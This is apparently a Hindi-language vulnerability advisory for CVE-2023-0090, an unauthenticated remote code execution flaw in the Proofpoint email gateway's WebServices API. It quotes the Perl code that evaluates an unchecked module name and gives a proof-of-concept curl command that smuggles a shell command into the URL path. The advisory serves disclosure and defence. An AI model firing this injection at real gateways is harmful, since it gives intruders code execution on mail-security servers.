
Proofpoint ईमेल गेटवे: अनप्रमाणित RCE
सुरक्षा शोधकर्ता: ly1g3, ly1g3[at]tuta.io
GPG फिंगरप्रिंट: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
अवलोकन: रिमोट कोड निष्पादन - अप्रमाणित RCE
CVE: CVE-2023-0090
समयरेखा:
Proofpoint मैसेजिंग सुरक्षा गेटवे के लिए शोषण
WebServices API तक पहुंच के साथ प्रशासक विशेषाधिकारों के साथ अप्रमाणित RCE प्राप्त किया जा सकता है।
Webservices.pm उपयोगकर्ता इनपुट को साफ या जांच नहीं करता है। फ़ंक्शन तक पहुंचने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है, लेकिन RCE करने में सक्षम होने के लिए सेटिंग्स में API पहुंच सक्षम होनी चाहिए। $module सीधे उपयोगकर्ता डेटा से आता है और इसका मूल्यांकन किया जाता है।
my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";
...
eval("require $module");
/tmp/ में abc नामक फ़ाइल बनाएगा। कोड pps उपयोगकर्ता के रूप में चलता है।
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"